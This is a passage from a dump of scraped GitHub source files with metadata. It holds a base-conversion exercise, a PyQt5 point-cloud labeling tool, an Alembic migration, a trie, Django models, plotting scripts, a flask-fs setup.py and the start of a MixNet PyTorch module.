16\n# aux = aux // 16\n \n# resto.append(dig)\n# if aux // 16 == 0:\n# aux = str(aux) # Transformando os valores em string.\n# dig = str(dig) # Transformando os valores em string.\n \n# if int(dig) > 9:\n# hex = aux + chr(int(dig) + 87) + str(resto[0]) # Transformando em hexadecimal com a conversão do num > 9.\n# print(hex)\n# break\n# else: # Se o valor < 9, imprime o hex normal.\n# hex = aux + dig\n# print(hex)\n# break\n\n# numero = int(input())\n# aux = numero\n# resto = []\n\n# while aux > 0:\n# dig = aux % 16\n# aux = aux // 16\n\n# resto.append(dig)\n# x = len(resto) - 1\n# resultado_hex = []\n\n# while (x >= 0):\n# resultado_hex.append(resto[x])\n# x = x -1\n\n# i = 0\n# while resto[i] // 16 == 0:\n\n\n\n# Decimais\ndef decimal_binario(numero):\n numero = int(numero)\n valor = ''\n resto = 0\n\n while True:\n resto = numero // 2\n aux = numero - (resto * 2)\n\n valor += str(aux)\n\n numero = numero // 2\n\n if numero <= 0:\n break\n print(valor[::-1], 'bin')\n\ndef decimal_hexa(numero):\n numero = int(numero)\n print(hex(numero)[2:], 'hex')\n\n# Bin\ndef binario_decimal(numero):\n numero = list(numero)\n valor = 0\n\n for i in numero:\n valor = valor * 2 + int(i)\n print(valor, 'dec')\ndef binario_hexa(numero):\n numero = list(numero)\n \n valor = 0\n\n for i in numero:\n valor = valor * 2 + int(i)\n \n print(hex(valor)[2:], 'hex')\n\n# HEXA\ndef hexa_decimal(numero):\n numero = int(numero, 16)\n\n print(numero, 'dec')\n\ndef hexa_binario(numero):\n numero = int(numero, 16)\n decimal_binario(numero)\n\nvezes = int(input())\n\nfor i in range(vezes):\n numero, base = input().split()\n print('Case %d:'%(i+1))\n\n if base == 'bin':\n binario_decimal(numero)\n binario_hexa(numero)\n\n elif base == 'dec':\n decimal_hexa(numero)\n decimal_binario(numero)\n \n elif base == 'hex':\n hexa_decimal(numero)\n hexa_binario(numero)\nprint()\nexit(0)","repo_name":"cl1sman/saberesPython","sub_path":"Courses/Alg-Prog/List/4/1193.py","file_name":"1193.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31907603813","text":"import os\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QComboBox, QListWidget\nfrom PyQt5.QtWidgets import QWidget, QHBoxLayout, QPushButton, QFileDialog, QStyleFactory, \\\n QVBoxLayout, \\\n QDesktopWidget\n\nfrom core.ComboCheckBox import ComboCheckBox\nfrom core.glwidget import GLWidget as gl_widget\n\n\nclass Window(QWidget):\n def __init__(self):\n super(Window, self).__init__()\n self.display_point = QPushButton('显示点云')\n self.display_relations_list = QListWidget()\n self.save_relation = QPushButton('保存当前关系')\n self.clear_write_btn = QPushButton('删除所有关系')\n self.revert_last_state = QPushButton('撤销当前写入')\n self.choose_write_directory = QFileDialog()\n self.gl_widget = gl_widget(self)\n self.write_btn = QPushButton('写入当前关系')\n self.relation_text = QComboBox()\n self.display_btn = QPushButton('显示组合obb')\n self.choose_file = QPushButton('选取文件夹 ')\n self.label_box = ComboCheckBox()\n self.file_dialog = QFileDialog()\n self.file_dialog_write = QFileDialog()\n self.data = []\n self.fake_data = []\n self.use_fake = False\n self.init_ui()\n self.obbs_path = ''\n self.save_path = ''\n self.relation_stack = []\n self.display_all_relations()\n\n def init_ui(self):\n\n main_layout = QHBoxLayout()\n main_layout.addWidget(self.gl_widget)\n child_layout_h_1 = QHBoxLayout()\n child_layout_h_2 = QHBoxLayout()\n child_layout_h_3 = QHBoxLayout()\n child_layout_v_1 = QVBoxLayout()\n\n # label choose\n self.label_box.show()\n self.label_box.fn_init_data(self.data)\n self.label_box.setMinimumContentsLength(15)\n self.label_box.setStyle(QStyleFactory.create('Windows'))\n self.label_box.currentIndexChanged.connect(lambda: self.on_click(self.label_box))\n\n # choose file dialog\n self.choose_file.toggle()\n self.choose_file.clicked.connect(lambda: self.on_click(self.choose_file))\n\n # display combined relations\n self.display_btn.toggle()\n self.display_btn.clicked.connect(lambda: self.on_click(self.display_btn))\n\n # 关系选择\n self.relation_text.addItems(['0: 邻接', '1:支撑', '2:环绕', '3:并列'])\n self.relation_text.currentIndexChanged.connect(lambda: self.on_click(self.relation_text))\n\n # 保存关系\n self.save_relation.toggle()\n self.save_relation.clicked.connect(lambda: self.on_click(self.save_relation))\n # 写入到txt\n self.write_btn.toggle()\n self.write_btn.clicked.connect(lambda: self.on_click(self.write_btn))\n # 删除当前所有关系\n self.clear_write_btn.toggle()\n self.clear_write_btn.clicked.connect(lambda: self.on_click(self.clear_write_btn))\n # 撤销前一个写入的关系\n self.revert_last_state.toggle()\n self.revert_last_state.clicked.connect(lambda: self.on_click(self.revert_last_state))\n # 显示所有关系\n self.display_relations_list.clicked.connect(lambda: self.on_click(self.display_relations_list))\n self.display_relations_list.currentItemChanged.connect(lambda: self.display_all_relations())\n # 显示点云\n self.display_point.toggle()\n self.display_point.clicked.connect(lambda: self.on_click(self.display_point))\n\n child_layout_h_1.addWidget(self.choose_file, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_1.addWidget(self.label_box, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_1.addWidget(self.display_btn, 0, Qt.AlignLeft | Qt.AlignTop)\n\n child_layout_h_2.addWidget(self.display_relations_list, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_2.addWidget(self.display_point, 0, Qt.AlignLeft | Qt.AlignTop)\n\n child_layout_h_3.addWidget(self.relation_text, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_3.addWidget(self.save_relation, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_3.addWidget(self.write_btn, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_3.addWidget(self.revert_last_state, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_3.addWidget(self.clear_write_btn, 0, Qt.AlignLeft | Qt.AlignTop)\n\n child_layout_v_1.addLayout(child_layout_h_1, 1)\n child_layout_v_1.addLayout(child_layout_h_2, 1)\n child_layout_v_1.addLayout(child_layout_h_3, 1)\n main_layout.addLayout(child_layout_v_1, 0)\n self.setLayout(main_layout)\n self.setWindowTitle(\"Label Tools\")\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def draw_multi_obb(self, index=None):\n if index:\n print('---draw_multi_obb', index)\n self.draw_labeled_box(index[0])\n else:\n checked_box = self.label_box.get_checked_box()\n print(checked_box)\n multi = []\n for j, checked_index in enumerate(checked_box):\n if self.use_fake:\n for i, d in enumerate(self.fake_data[checked_box[j]].split(',')):\n multi.append(int(d.split(':')[0]))\n else:\n for i, d in enumerate(self.data[checked_box[j]].split(',')):\n multi.append(int(d.split(':')[0]))\n self.draw_labeled_box(multi)\n\n # onclick event handler\n def on_click(self, widget):\n if widget == self.label_box:\n self.draw_labeled_box([widget.currentIndex()])\n if widget == self.choose_file:\n directory = self.file_dialog.getExistingDirectory(self, '选取文件夹', '')\n print(directory)\n self.obbs_path = directory\n self.change_obbs(directory)\n if widget == self.display_btn:\n self.draw_multi_obb()\n if widget == self.relation_text:\n index = widget.currentIndex()\n checked_index = self.label_box.get_checked_box()\n if checked_index:\n print(checked_index)\n # print(','.join(checked_index))\n print(str(checked_index), str(index))\n if widget == self.write_btn:\n self.write_txt()\n if widget == self.clear_write_btn:\n self.clear_txt()\n if widget == self.revert_last_state:\n self.back_stack()\n if widget == self.save_relation:\n self.write_single_relation()\n # 没生效\n if widget == self.display_relations_list:\n self.draw_multi_obb(self.relation_stack[self.display_relations_list.currentIndex()])\n if widget == self.display_point:\n self.display_all_point()\n\n # 删除\n def clear_txt(self):\n self.relation_stack = []\n if self.save_path != '':\n if os.path.isfile(self.save_path):\n os.remove(self.save_path)\n self.use_fake = False\n\n # 撤销\n def back_stack(self):\n print('back_stack', self.relation_stack)\n self.relation_stack.pop()\n if not self.relation_stack:\n self.use_fake = False\n self.display_all_relations()\n\n # 保存单个\n def write_single_relation(self):\n # 先压栈\n pair = self.label_box.get_checked_box()\n pair_temp = ''\n\n if self.use_fake:\n for i, p in enumerate(pair):\n for single in self.fake_data[p].split(','):\n print(single)\n pair_temp = pair_temp + '-' + single.split(':')[0]\n pair = pair_temp\n else:\n pair = '-'.join([str(x) for x in pair])\n if len(pair) >= 1:\n index = self.relation_text.currentIndex()\n if (pair, index) not in self.relation_stack:\n self.relation_stack.append((pair, index))\n self.display_all_relations()\n fake_data = []\n record = []\n # 现有的都是-a-b-c 组织起来的\n for (pair, index) in self.relation_stack:\n temp_list = []\n print(pair.split('-'))\n for p in pair.split('-'):\n if p != '':\n record.append(int(p))\n temp_list.append(self.data[int(p)])\n fake_data.append(','.join([str(x) for x in temp_list]))\n for i, d in enumerate(self.data):\n if i in record:\n pass\n else:\n fake_data.append(d)\n print(fake_data)\n self.fake_data = fake_data\n self.label_box.fn_init_data(self.fake_data)\n self.use_fake = True\n\n # 保存\n\n def write_txt(self):\n path = self.obbs_path\n file_name = path.split('/')[-1] + '_result.txt'\n print(path)\n print(file_name)\n directory = self.file_dialog_write.getExistingDirectory(self, '选取存储位置', '')\n print(directory)\n self.save_path = os.path.join(directory, file_name)\n with open(self.save_path, 'a+')as fp:\n for i, (index, relation) in enumerate(self.relation_stack):\n fp.write(','.join(str(x) for x in index) + ':' + str(relation) + \"\\n\")\n\n # 画出bbox\n def draw_labeled_box(self, index):\n self.gl_widget.repaint_with_data(index)\n\n # 更换 bbox\n def change_obbs(self, path):\n self.gl_widget.change_data(path)\n self.data = self.gl_widget.get_label_data()\n print(self.data)\n self.label_box.clear()\n self.label_box.fn_init_data(self.data)\n\n # 显示所有已保存的关系\n def display_all_relations(self):\n self.display_relations_list.clear()\n for relation in self.relation_stack:\n self.display_relations_list.addItem(str(relation))\n\n def display_all_point(self):\n self.gl_widget.display_point()\n","repo_name":"faultaddr/SceneLabel","sub_path":"core/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":9922,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"17203036159","text":"\"\"\"empty message\r\n\r\nRevision ID: 2cebc5feb870\r\nRevises: a3fd1cedce97\r\nCreate Date: 2021-03-11 04:33:48.011133\r\n\r\n\"\"\"\r\nfrom alembic import op\r\nimport sqlalchemy as sa\r\n\r\n\r\n# revision identifiers, used by Alembic.\r\nrevision = '2cebc5feb870'\r\ndown_revision = 'a3fd1cedce97'\r\nbranch_labels = None\r\ndepends_on = None\r\n\r\n\r\ndef upgrade():\r\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('items',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=80), nullable=True),\n sa.Column('description', sa.String(length=100), nullable=True),\n sa.Column('unit', sa.String(length=80), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_table('Items')\n # ### end Alembic commands ###\r\n\r\n\r\ndef downgrade():\r\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('Items',\n sa.Column('id', sa.INTEGER(), server_default=sa.text('nextval(\\'\"Items_id_seq\"\\'::regclass)'), autoincrement=True, nullable=False),\n sa.Column('title', sa.VARCHAR(length=80), autoincrement=False, nullable=True),\n sa.Column('description', sa.VARCHAR(length=100), autoincrement=False, nullable=True),\n sa.Column('unit', sa.VARCHAR(length=80), autoincrement=False, nullable=True),\n sa.Column('price', sa.INTEGER(), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id', name='Items_pkey')\n )\n op.drop_table('items')\n # ### end Alembic commands ###\r\n","repo_name":"Khenry784/7miles-","sub_path":"migrations/versions/2cebc5feb870_.py","file_name":"2cebc5feb870_.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73388985525","text":"# class Node:\n# def __init__(self) -> None:\n# self.key = None\n# self.value = None\n# self.children = {}\n\n\n# class Trie:\n# def __init__(self) -> None:\n# self.root = Node()\n\n# def insert(self, word, value):\n# currentWord = word\n# currentNode = self.root\n\n# while len(currentWord) > 0:\n# char = currentWord[0] # 1st character\n# if char in currentNode.children:\n# currentNode = currentNode.children[char] # move curr node forward\n# currentWord = currentWord[1:] # consider the remaining characters\n\n# else:\n# newNode = Node()\n# newNode.key = char\n\n# if len(currentWord) == 1:\n# newNode.value = value\n\n# currentNode.children[char] = newNode\n# currentNode = newNode\n# currentWord = currentWord[1:]\n\n# def lookup(self, word):\n# currentWord = word\n# currentNode = self.root\n\n# while len(currentWord) > 0:\n# char = currentWord[0] # 1st char\n\n# if char in currentNode.children:\n# currentNode = currentNode.children[char] # move node forward\n# print(currentNode.key, end=\"-->\")\n# currentWord = currentWord[1:]\n# else:\n# return \"Not in trie\"\n\n# if currentNode.value == None:\n# return \"None\"\n# return currentNode.value\n\n# def printAllNodes(self):\n# nodes = [self.root]\n# while len(nodes) > 0:\n# for letter in nodes[0].children:\n# nodes.append(nodes[0].children[letter])\n\n# return nodes\n\n\n# def makeTrie(words):\n# trie = Trie()\n# for word, value in words.items():\n# trie.insert(word, value)\n# return trie\n\n\n# trie = makeTrie({\"how\": 4, \"are\": 20, \"you\": 3})\n\n# print(trie.lookup(\"how\"))\n# print(trie.printAllNodes())\n\n\n# ------------------------------------------ #\n\nclass TrieNode:\n def __init__(self):\n self.children = {}\n self.end_of_word = False\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word):\n current_node = self.root\n for char in word:\n if char not in current_node.children:\n current_node.children[char] = TrieNode()\n print(\"Current node:\", current_node.__str__())\n current_node = current_node.children[char]\n current_node.end_of_word = True\n\n def search(self, word):\n current_node = self.root\n for char in word:\n if char not in current_node.children:\n return False\n current_node = current_node.children[char]\n return current_node.end_of_word\n\n def starts_with(self, prefix):\n current_node = self.root\n for char in prefix:\n if char not in current_node.children:\n return False\n current_node = current_node.children[char]\n return True\n\n# Create a Trie object\ntrie = Trie()\n\n# Insert some words into the trie\ntrie.insert(\"apple\")\ntrie.insert(\"banana\")\ntrie.insert(\"pear\")\ntrie.insert(\"peach\")\n\n# Search for a word in the trie\nprint(trie.search(\"apple\")) # True\nprint(trie.search(\"grape\")) # False\n\n# Check if a word starts with a given prefix\nprint(trie.starts_with(\"pe\")) # True\nprint(trie.starts_with(\"gr\")) # False","repo_name":"Dipankar-Medhi/DSA-with-Python","sub_path":"Educative/trie/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29585372469","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Game(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tGameName = models.CharField(max_length=50)\n\turl = models.TextField()\n\n\nclass Conn(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tuserId = models.ForeignKey(User,on_delete=models.CASCADE)\n\tgameId = models.ForeignKey(Game,on_delete=models.CASCADE)\n\tscore = models.IntegerField()\n\nclass UserProfile(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tuser = models.ForeignKey(User,on_delete=models.CASCADE,unique=True)\n\tprofile_image = models.ImageField(upload_to=\"profile_photos\", blank=True, null=True)\n","repo_name":"gjergjk71/gaming-platform","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32730480191","text":"import src.controller.api.google_maps_client as google_maps_client\nimport src.config as config\nimport pytest\n\n\ndef test_get_coordinates_invalid_location_results_in_error():\n \"\"\" Test that error is thrown when we the location given to the function is invalid \"\"\"\n\n with pytest.raises(AssertionError, match='Invalid location/address'):\n google_maps_client.get_coordinates(\"\")\n\ndef test_get_coordinates():\n \"\"\" Test valid coordinates are returned for a valid location \"\"\"\n\n if len(config.GMAP_API_KEY) > 0:\n expected_output = {'lat': 42.40483030000001, 'lng': -72.52925239999999}\n actual_output = google_maps_client.get_coordinates(\"1039 North Pleasant Street, Amherst, MA, USA\")\n assert actual_output == expected_output\n else:\n # skip assertion since API key is required to test above function\n assert 1 == 1","repo_name":"kavyaharlalka/kashikoi-elena-navigation","sub_path":"test/unit/test_google_maps_client.py","file_name":"test_google_maps_client.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24890359449","text":"print(\"---\"*20)\nprint(\" LOJA SUPER BARATÃO\")\nprint(\"---\"*20)\nsoma = quanti = quanti1 = 0\nwhile True:\n produto = str(input(\"Nome do Produto: \")).strip()\n preco = float(input(\"Preço: R$\"))\n soma += preco\n quanti += 1\n if quanti == 1:\n barato = preco\n bp = produto\n if barato > preco:\n barato = preco\n bp = produto\n if preco > 1000:\n quanti1 += 1\n resp = ' '\n while resp not in 'SN':\n resp = str(input(\"Quer continuar? [S/N] \")).upper().strip()[0]\n if resp == \"N\":\n break\nprint(\"----\"*5, \"FIM DO PROGRAMA\", \"----\"*5)\nprint(\"O total da compra foi R${:.2f}\".format(soma))\nprint(\"Temos {} produtos custando mais de R$1000.00\".format(quanti1))\nprint(\"O produto mais barato foi {} que custa R${:.2f}\".format(bp, barato))\n","repo_name":"ezequielfsilva/ProgramasPython","sub_path":"ex70.py","file_name":"ex70.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"317349328","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib; matplotlib.use('Agg')\nimport matplotlib.ticker as ticker\nparams = {\"mathtext.default\": \"regular\"}\nplt.rcParams.update(params)\n\n\ndef box(gpei_file, saas_file, name, rank_type='median', bold_nums=5):\n gpei = pd.read_csv(gpei_file)\n saas = pd.read_csv(saas_file)\n keys = list(gpei.columns)\n keys_nor = []\n for k in keys:\n gpei[k] = 1. / gpei[k]\n saas[k] = 1. / saas[k]\n items = k.split('_')\n if items[-1] == \"DoseLimit\":\n t = r'$\\mathrm{D^{it0}_{it1} dose}$'\n elif items[-1] == \"Priority\":\n t = r'$\\mathrm{D^{it0}_{it1} weight}$'\n t = t.replace(\"it0\", items[0])\n t = t.replace(\"it1\", items[1])\n t = t.replace('%', '\\%')\n print(k)\n keys_nor.append(t)\n\n gpei_max = gpei.median().max()\n saas_max = saas.median().max()\n\n # Normalize\n for k in keys:\n gpei[k] = gpei[k] / gpei_max\n saas[k] = saas[k] / saas_max\n\n gpei_mean = []\n saas_mean = []\n gpei_median = []\n saas_median = []\n gpei_std = []\n saas_std = []\n for k in keys:\n gpei_mean.append(gpei[k].mean())\n gpei_std.append(gpei[k].std())\n saas_mean.append(saas[k].mean())\n saas_std.append(saas[k].std())\n saas_median.append(saas[k].median())\n gpei_median.append(gpei[k].median())\n\n if rank_type == 'median':\n gpei_index = list(np.argsort(gpei_median))\n saas_index = list(np.argsort(saas_median))\n elif rank_type == 'mean':\n gpei_index = list(np.argsort(gpei_mean))\n saas_index = list(np.argsort(saas_mean))\n\n gpei_obj_rank = [keys_nor[i] for i in gpei_index]\n saas_obj_rank = [keys_nor[i] for i in saas_index]\n gpei_key_rank = [keys[i] for i in gpei_index]\n saas_key_rank = [keys[i] for i in saas_index]\n\n gpei_box = [list(gpei[k]) for k in gpei_key_rank]\n saas_box = [list(saas[k]) for k in saas_key_rank]\n\n for i in range(bold_nums):\n ind = len(saas_obj_rank) - i - 1\n saas_obj_rank[ind] = saas_obj_rank[ind].replace(\"mathrm\", \"mathbf\")\n j = gpei_index.index(saas_index[ind])\n gpei_obj_rank[j] = gpei_obj_rank[j].replace(\"mathrm\", \"mathbf\")\n\n fig, ax = plt.subplots(1, 2, constrained_layout=True, figsize=(25, 23))\n ax[1].boxplot(gpei_box, vert=False, showmeans=False, showfliers=False)\n ax[0].boxplot(saas_box, vert=False, showmeans=False, showfliers=False)\n ax[1].yaxis.set_major_formatter(ticker.FixedFormatter((gpei_obj_rank)))\n ax[0].yaxis.set_major_formatter(ticker.FixedFormatter((saas_obj_rank)))\n ax[1].set_yticklabels(gpei_obj_rank, fontsize=25)\n ax[0].set_yticklabels(saas_obj_rank, fontsize=25)\n ax[0].set_xticklabels([0.0, 0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0], fontsize=25)\n ax[1].set_xticklabels([0.6, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4], fontsize=25)\n ax[0].set_xlabel('Relative Importance', fontsize=30)\n ax[1].set_xlabel('Relative Importance', fontsize=30)\n ax[1].set_title('GPEI', fontsize=40)\n ax[0].set_title('SAAS-BO', fontsize=40)\n plt.savefig('./fig/'+name+'.pdf')\n plt.show()\n\n\n\nif __name__ == '__main__':\n gpei_file = './data/parameter_importance/lenscale-gpei.csv'\n saas_file = './data/parameter_importance/lenscale-saas.csv'\n box(gpei_file, saas_file, 'lengthscales')\n\n","repo_name":"inamoto85/BOPlanner","sub_path":"results/importance_boxplot.py","file_name":"importance_boxplot.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71725646644","text":"# Sketch the feasible set of problem2 in ./asset/homework_2.PDF\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 利用sin,cos函数画圆\n# 利用fill()函数填充图形区域\na_x = np.arange(0, 2 * np.pi, 0.01)\na = 1 + 1 * np.cos(a_x)\nb = 1 + 1 * np.sin(a_x)\nplt.plot(a, b, color='b', linestyle='-', label=r'$(x_1-1)^2+(x_2-1)^2 ≤ 1$')\nplt.fill(a, b, color='b')\nplt.plot(a, -b, color='purple', linestyle='-', label=r'$(x_1-1)^2+(x_2+1)^2 ≤ 1$')\nplt.fill(a, -b, color='purple')\n\na = 0.8 * np.cos(a_x)\nb = 0.8 * np.sin(a_x)\nplt.plot(a, b, linestyle='-.', label=r'$p = 0.8$')\n\na = 1.2 * np.cos(a_x)\nb = 1.2 * np.sin(a_x)\nplt.plot(a, b, linestyle='-.', label=r'$p = 1.2$')\n\na = 1.6 * np.cos(a_x)\nb = 1.6 * np.sin(a_x)\nplt.plot(a, b, linestyle='-.', label=r'$p = 1.6$')\n\nplt.axvline(0, color='black')\nplt.axhline(0, color='black')\nplt.plot(0, 0, '.')\nplt.plot(1, 0, '.', color='r')\n\nplt.annotate('feasible point', xy=(1, 0), xytext=(+30, -30), textcoords='offset points', fontsize=10,\n arrowprops=dict(arrowstyle='->', connectionstyle='arc3,rad=.0'))\n\nplt.ylim(-3, 5)\nplt.xlim(-3, 5)\nplt.legend()\nplt.show()\n","repo_name":"yi212212/optimal_homework2","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4041393403","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom os.path import join, dirname\n\nfrom setuptools import setup, find_packages\n\nROOT = dirname(__file__)\n\nRE_REQUIREMENT = re.compile(r'^\\s*-r\\s*(?P.*)$')\n\nPYPI_RST_FILTERS = (\n # Replace code-blocks\n (r'\\.\\.\\s? code-block::\\s*(\\w|\\+)+', '::'),\n # Remove all badges\n (r'\\.\\. image:: .*', ''),\n (r' :target: .*', ''),\n (r' :alt: .*', ''),\n)\n\n\ndef rst(filename):\n '''\n Load rst file and sanitize it for PyPI.\n Remove unsupported github tags:\n - code-block directive\n - all badges\n '''\n content = open(filename).read()\n for regex, replacement in PYPI_RST_FILTERS:\n content = re.sub(regex, replacement, content)\n return content\n\n\ndef pip(filename):\n \"\"\"Parse pip reqs file and transform it to setuptools requirements.\"\"\"\n requirements = []\n for line in open(join(ROOT, 'requirements', filename)):\n line = line.strip()\n if not line or '://' in line:\n continue\n match = RE_REQUIREMENT.match(line)\n if match:\n requirements.extend(pip(match.group('filename')))\n else:\n requirements.append(line)\n return requirements\n\n\nlong_description = '\\n'.join((\n rst('README.rst'),\n rst('CHANGELOG.rst'),\n ''\n))\n\ns3_require = pip('s3.pip')\nswift_require = pip('swift.pip')\ngridfs_require = pip('gridfs.pip')\nall_require = s3_require + swift_require + gridfs_require\ntests_require = pip('test.pip') + all_require\ndoc_require = pip('doc.pip')\ndev_require = tests_require + ['invoke', 'tox', 'sphinx', 'alabaster']\n\nsetup(\n name='flask-fs',\n version=__import__('flask_fs').__version__,\n description=__import__('flask_fs').__description__,\n long_description=long_description,\n url='https://github.com/noirbizarre/flask-fs',\n download_url='http://pypi.python.org/pypi/flask-fs',\n author='Axel Haustant',\n author_email='noirbizarre@gmail.com',\n packages=find_packages(),\n include_package_data=True,\n install_requires=pip('install.pip'),\n tests_require=tests_require,\n extras_require={\n 'doc': doc_require,\n 'test': tests_require,\n 's3': s3_require,\n 'swift': swift_require,\n 'gridfs': gridfs_require,\n 'all': all_require,\n 'test': tests_require,\n 'dev': dev_require,\n },\n license='MIT',\n use_2to3=True,\n zip_safe=False,\n keywords='',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python',\n 'Environment :: Web Environment',\n 'Operating System :: OS Independent',\n 'Intended Audience :: Developers',\n 'Topic :: System :: Software Distribution',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'License :: OSI Approved :: MIT License',\n ],\n)\n","repo_name":"Cloudxtreme/flask-fs","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"6089266121","text":"from odoo import models\n\n\nclass IotDeviceInput(models.Model):\n\n _inherit = \"iot.device.input\"\n\n def get_options(self):\n data = {}\n for option in self.device_id.option_ids:\n data[option.property_id.tech_name] = getattr(\n option, option.field_name, False\n )\n if (\n option.field_type == \"bool\"\n and option.property_id.is_action\n and option.value_bool\n ):\n option.value_bool = False\n return data\n","repo_name":"OCA/iot","sub_path":"iot_option_oca/models/iot_device_input.py","file_name":"iot_device_input.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"76"} +{"seq_id":"72564756084","text":"# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# LightNet++: Boosted Light-weighted Networks for Real-time Semantic Segmentation\n# ---------------------------------------------------------------------------------------------------------------- #\n# PyTorch implementation for MixNet\n# class:\n# > Swish\n# > SEBlock\n# > GPConv\n# > MDConv\n# > MixDepthBlock\n# > MixNet(S, M, L)\n# ---------------------------------------------------------------------------------------------------------------- #\n# Author: Huijun Liu M.Sc.\n# Date: 15.02.2020\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nfrom torch.nn import functional as F\nfrom collections import OrderedDict\n\nfrom torch import nn\nimport torch\nimport math\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# Swish: Swish Activation Function\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass Swish(nn.Module):\n def __init__(self, inplace=True):\n super(Swish, self).__init__()\n self.inplace = inplace\n\n def forward(self, x):\n return x.mul_(x.sigmoid()) if self.inplace else x.mul(x.sigmoid())\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# SEBlock: Squeeze & Excitation (SCSE)\n# namely, Channel-wise Attention\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass SEBlock(nn.Module):\n def __init__(self, in_planes, reduced_dim, act_type=\"swish\"):\n super(SEBlock, self).__init__()\n self.channel_se = nn.Sequential(OrderedDict([\n (\"linear1\", nn.Conv2d(in_planes, reduced_dim, kernel_size=1, stride=1, padding=0, bias=True)),\n (\"act\", Swish(inplace=True) if act_type == \"swish\" else nn.ReLU(inplace=True)),\n (\"linear2\", nn.Conv2d(reduced_dim, in_planes, kernel_size=1, stride=1, padding=0, bias=True))\n ]))\n\n def forward(self, x):\n x_se = torch.sigmoid(self.channel_se(F.adaptive_avg_pool2d(x, output_size=(1, 1))))\n return torch.mul(x, x_se)\n\n\nclass ConvBlock(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_size, stride=1,\n groups=1, dilate=1, act_type=\"swish\"):\n\n super(ConvBlock, self).__init__()\n assert stride in [1, 2]\n dilate = 1 if stride > 1 else dilate\n padding = ((kernel_size - 1) // 2) * dilate\n\n self.conv_block = nn.Sequential(OrderedDict([\n (\"conv\", nn.Conv2d(in_channels=in_planes, out_channels=out_planes,\n kernel_size=kernel_size, stride=stride, padding=padding,\n dilation=dilate, groups=groups, bias=False)),\n (\"norm\", nn.BatchNorm2d(num_features=out_planes,\n eps=1e-3, momentum=0.01)),\n (\"act\", Swish(inplace=True) if act_type == \"swish\" else nn.ReLU(inplace=True))\n ]))\n\n def forward(self, x):\n return self.conv_block(x)\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# GPConv: Grouped Point-wise Convolution for MixDepthBlock\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass GPConv(nn.Module):\n def __init__(self, in_planes, out_planes, 